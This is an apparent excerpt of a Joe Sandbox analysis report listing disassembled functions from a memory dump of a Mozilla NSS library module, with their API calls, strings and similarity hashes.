Function 6C59AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C59AF47

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

FreeLibrary.KERNEL32(?), ref: 6C59AF6D
free.MOZGLUE(?), ref: 6C59AFA4
free.MOZGLUE(?), ref: 6C59AFAA
PR_ExitMonitor.NSS3 ref: 6C59AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C59AFF5
PR_ExitMonitor.NSS3 ref: 6C59B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C59B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C59B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C59B03C

Strings

Unloaded library %s, xrefs: 6C59B023
%s decr => %d, xrefs: 6C59AFF0

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: cb9aafd01308524e91741b0d5f7f7dfe3d1b9564fd0054872e0576c22a1e2aaa
Instruction ID: 2721759f88a717af97f222f8dc0c548582850b106a647a0112039daa44ba1591
Opcode Fuzzy Hash: cb9aafd01308524e91741b0d5f7f7dfe3d1b9564fd0054872e0576c22a1e2aaa
Instruction Fuzzy Hash: DE31F6F9F04140ABEB01EF65DC40A45B775EB4630CB1441B9E80796E00FB22E828CBB6

Function 6C5E6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C5E781D,00000000,6C5DBE2C,?,6C5E6B1D,?,?,?,?,00000000,00000000,6C5E781D), ref: 6C5E6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C5E781D,?,6C5DBE2C,?), ref: 6C5E6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C5E781D), ref: 6C5E6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C5E6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C5E6C96

Part of subcall function 6C591240: TlsGetValue.KERNEL32(00000040,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591267
Part of subcall function 6C591240: EnterCriticalSection.KERNEL32(?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C59127C
Part of subcall function 6C591240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591291
Part of subcall function 6C591240: PR_Unlock.NSS3(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C5912A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C5E6CAA

Strings

extern:, xrefs: 6C5E6C7E
sql:, xrefs: 6C5E6C52
rdb:, xrefs: 6C5E6C69
dbm:, xrefs: 6C5E6C3A
dbm, xrefs: 6C5E6CA4
NSS_DEFAULT_DB_TYPE, xrefs: 6C5E6C91

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 9a3aba98a30e3079ded21d31f7afc02b64c8af529872f2a0bc845b9f9fe7a4e3
Instruction ID: 86fd1729b1904374d5bd3d4d03ae32b9785c00a11ff3b0751ec71dacb946f9e2
Opcode Fuzzy Hash: 9a3aba98a30e3079ded21d31f7afc02b64c8af529872f2a0bc845b9f9fe7a4e3
Instruction Fuzzy Hash: 3E01F2B17073153BFA10277B2C8AF63220E9F5918CF140832FF19E0982EFA2E51580AD

Function 6C5F4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C5B78F8), ref: 6C5F4E6D

Part of subcall function 6C5909E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C5906A2,00000000,?), ref: 6C5909F8
Part of subcall function 6C5909E0: malloc.MOZGLUE(0000001F), ref: 6C590A18
Part of subcall function 6C5909E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C590A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C5B78F8), ref: 6C5F4ED9

Part of subcall function 6C5E5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C5E7703,?,00000000,00000000), ref: 6C5E5942
Part of subcall function 6C5E5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C5E7703), ref: 6C5E5954
Part of subcall function 6C5E5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5E596A
Part of subcall function 6C5E5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5E5984
Part of subcall function 6C5E5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C5E5999
Part of subcall function 6C5E5920: free.MOZGLUE(00000000), ref: 6C5E59BA
Part of subcall function 6C5E5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C5E59D3
Part of subcall function 6C5E5920: free.MOZGLUE(00000000), ref: 6C5E59F5
Part of subcall function 6C5E5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C5E5A0A
Part of subcall function 6C5E5920: free.MOZGLUE(00000000), ref: 6C5E5A2E
Part of subcall function 6C5E5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C5E5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4EB3

Part of subcall function 6C5F4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5F4EB8,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F484C
Part of subcall function 6C5F4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5F4EB8,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F486D
Part of subcall function 6C5F4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C5F4EB8,?), ref: 6C5F4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4EC0

Part of subcall function 6C5F4470: TlsGetValue.KERNEL32(00000000,?,6C5B7296,00000000), ref: 6C5F4487
Part of subcall function 6C5F4470: EnterCriticalSection.KERNEL32(?,?,?,6C5B7296,00000000), ref: 6C5F44A0
Part of subcall function 6C5F4470: PR_Unlock.NSS3(?,?,?,?,6C5B7296,00000000), ref: 6C5F44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F4F8F
PK11_UpdateSlotAttribute.NSS3(?,6C6CDCB0,00000000), ref: 6C5F4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C5F501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C5B78F8), ref: 6C5F506B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: c180bfcad5d26a931fc0b5e20145275914b650eb3cb8ae33410fccd7c6771178
Instruction ID: 4ac21f56477129f482bf05a22814c289c893d7c2e9238c3f9497dd634219a02b
Opcode Fuzzy Hash: c180bfcad5d26a931fc0b5e20145275914b650eb3cb8ae33410fccd7c6771178
Instruction Fuzzy Hash: 0151F4F6A00201DBEB159F25EC4569B37B9EF4531CF048535E82A86B12FB31D91ACF92

Function 6C59ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C59ACE2
malloc.MOZGLUE(00000001), ref: 6C59ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C59AD02
TlsGetValue.KERNEL32 ref: 6C59AD3C
calloc.MOZGLUE(00000001,?), ref: 6C59AD8C
PR_Unlock.NSS3 ref: 6C59ADC0
free.MOZGLUE(00000000), ref: 6C59AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C59AE58
free.MOZGLUE(00000000), ref: 6C59AE69
free.MOZGLUE(?), ref: 6C59AE78
PR_Unlock.NSS3 ref: 6C59AE8C
free.MOZGLUE(?), ref: 6C59AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C59AEC7

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: f6800438ac128afd105b1b770140b94fc55f54ba09b3fb79898ec79fb86d7994
Instruction ID: d24eb89d8adf0b7470663953e21495e902424fb4b6a914b540e96b22c8529adc
Opcode Fuzzy Hash: f6800438ac128afd105b1b770140b94fc55f54ba09b3fb79898ec79fb86d7994
Instruction Fuzzy Hash: 1F51BEB0F002569BDF00DF69DC816AE77B4BB06348F1844B9D815A7B10DB31A914CBEA

Function 6C674C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C674CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C674CFD
sqlite3_value_text16.NSS3(?), ref: 6C674D44

Strings

abort due to ROLLBACK, xrefs: 6C674D27, 6C674D33
out of memory, xrefs: 6C674C78, 6C674C9E
another row available, xrefs: 6C674D20
bad parameter or other API misuse, xrefs: 6C674D05
invalid, xrefs: 6C674CF1
no more rows available, xrefs: 6C674D2E
API call with %s database connection pointer, xrefs: 6C674CF6
unknown error, xrefs: 6C674D56

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 089a81308007e714226bfa6b7dbeb4fe438a79c582ba79e38897675e786373e6
Instruction ID: fafaac22129dd6bf0028478a650aff1384b08a9e9679d79e7800f72973685902
Opcode Fuzzy Hash: 089a81308007e714226bfa6b7dbeb4fe438a79c582ba79e38897675e786373e6
Instruction Fuzzy Hash: 733168B3E08951A7D7244A24A9087F4B3A27B82318F150D29D4645BE15CBE1AC62CFFE

Function 6C5D2CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C5D2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C5D2D07

Part of subcall function 6C6B09D0: PR_Now.NSS3 ref: 6C6B0A22
Part of subcall function 6C6B09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C6B0A35
Part of subcall function 6C6B09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C6B0A66
Part of subcall function 6C6B09D0: PR_GetCurrentThread.NSS3 ref: 6C6B0A70
Part of subcall function 6C6B09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C6B0A9D
Part of subcall function 6C6B09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C6B0AC8
Part of subcall function 6C6B09D0: PR_vsmprintf.NSS3(?,?), ref: 6C6B0AE8
Part of subcall function 6C6B09D0: EnterCriticalSection.KERNEL32(?), ref: 6C6B0B19
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C6B0B48
Part of subcall function 6C6B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C6B0C76
Part of subcall function 6C6B09D0: PR_LogFlush.NSS3 ref: 6C6B0C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C5D2D22

Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(?), ref: 6C6B0B88
Part of subcall function 6C6B09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6B0C5D
Part of subcall function 6C6B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C6B0C8D
Part of subcall function 6C6B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6B0C9C
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(?), ref: 6C6B0CD1
Part of subcall function 6C6B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C6B0CEC
Part of subcall function 6C6B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6B0CFB
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C6B0D16
Part of subcall function 6C6B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C6B0D26
Part of subcall function 6C6B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6B0D35
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C6B0D65
Part of subcall function 6C6B09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C6B0D70
Part of subcall function 6C6B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C6B0D90
Part of subcall function 6C6B09D0: free.MOZGLUE(00000000), ref: 6C6B0D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C5D2D3B

Part of subcall function 6C6B09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C6B0BAB
Part of subcall function 6C6B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6B0BBA
Part of subcall function 6C6B09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6B0D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C5D2D54

Part of subcall function 6C6B09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B0BCB
Part of subcall function 6C6B09D0: EnterCriticalSection.KERNEL32(?), ref: 6C6B0BDE
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(?), ref: 6C6B0C16

Strings

pPin = 0x%p, xrefs: 6C5D2D1D
pLabel = 0x%p, xrefs: 6C5D2D4F
ulPinLen = %d, xrefs: 6C5D2D36
C_InitToken, xrefs: 6C5D2CE7
slotID = 0x%x, xrefs: 6C5D2D02
nkl, xrefs: 6C5D2D6C, 6C5D2D9A

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nkl
API String ID: 420000887-3781152025
Opcode ID: b67468ed27fb7ae8da330682360f902f33eef61f0071e4872cbc84c6bc6a47db
Instruction ID: 940be24396cd1fcc7a574507ef8178272e4161142244e2686eed64079e7a7860
Opcode Fuzzy Hash: b67468ed27fb7ae8da330682360f902f33eef61f0071e4872cbc84c6bc6a47db
Instruction Fuzzy Hash: E721A4B6700245EFDB00BF58DD4CA453BB1EB8731AF458169E504A7622DF30AC59CB66

Function 6C672D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C672D9F

Part of subcall function 6C52CA30: EnterCriticalSection.KERNEL32(?,?,?,6C58F9C9,?,6C58F4DA,6C58F9C9,?,?,6C55369A), ref: 6C52CA7A
Part of subcall function 6C52CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C52CB26

sqlite3_exec.NSS3(?,?,6C672F70,?,?), ref: 6C672DF9
sqlite3_free.NSS3(00000000), ref: 6C672E2C
sqlite3_free.NSS3(?), ref: 6C672E3A
sqlite3_free.NSS3(?), ref: 6C672E52
sqlite3_mprintf.NSS3(6C6DAAF9,?), ref: 6C672E62
sqlite3_free.NSS3(?), ref: 6C672E70
sqlite3_free.NSS3(?), ref: 6C672E89
sqlite3_free.NSS3(?), ref: 6C672EBB
sqlite3_free.NSS3(?), ref: 6C672ECB
sqlite3_free.NSS3(00000000), ref: 6C672F3E
sqlite3_free.NSS3(?), ref: 6C672F4C

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 036735677b9f4a95ee0dba9ba116c704d0acc9f06036494cb0565b9da91d5918
Instruction ID: a57ab78001a17c7b11d566199f21bd2b0febfd622737feed530b01745826c77b
Opcode Fuzzy Hash: 036735677b9f4a95ee0dba9ba116c704d0acc9f06036494cb0565b9da91d5918
Instruction Fuzzy Hash: BB617CB5E00205CBEB10CFA8D884BDEB7F1AF89358F144828DC55A7741E735E855CBA9

Function 6C5B7C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C702120,6C5B7E60,00000000,?,?,?,?,6C63067D,6C631C60,00000000), ref: 6C5B7C81

Part of subcall function 6C524C70: TlsGetValue.KERNEL32(?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524C97
Part of subcall function 6C524C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CB0
Part of subcall function 6C524C70: PR_Unlock.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CC9

TlsGetValue.KERNEL32 ref: 6C5B7CA0
EnterCriticalSection.KERNEL32(?), ref: 6C5B7CB4
PR_Unlock.NSS3 ref: 6C5B7CCF

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

TlsGetValue.KERNEL32 ref: 6C5B7D04
EnterCriticalSection.KERNEL32(?), ref: 6C5B7D1B
realloc.MOZGLUE(-00000050), ref: 6C5B7D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B7DF4
PR_Unlock.NSS3 ref: 6C5B7E0E

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: 4989f842cf4b6b7b1f7f60b0b8f0cf9dc790dd80a227b498fa2b4d119538072a
Instruction ID: 79e59e298cda1e4e036679d2db3d5b7705b1934f3a4d135c8c9851dedf66129a
Opcode Fuzzy Hash: 4989f842cf4b6b7b1f7f60b0b8f0cf9dc790dd80a227b498fa2b4d119538072a
Instruction Fuzzy Hash: 545104B6B04100AFDB00AF28DC54A653BB5EB463D8F15853EEA0567722EF30D854CBA1

Function 6C524C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CB0
PR_Unlock.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524D97
PR_Lock.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524DBA
PR_WaitCondVar.NSS3 ref: 6C524DD4
PR_Unlock.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524DEF

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 283c9ea25cd19b75596aa3c1742f8d9b5b794c571bd6679ce542dad2468a94c1
Instruction ID: 680fd1ae1fb31775a84efbdda739f45ebdb0a88b6f05bb94d39a07672c05190c
Opcode Fuzzy Hash: 283c9ea25cd19b75596aa3c1742f8d9b5b794c571bd6679ce542dad2468a94c1
Instruction Fuzzy Hash: B2418CB5A04615CFCB00EF7DD884159BBF4BF46318F058A69DC889BB50EB34D894CB86

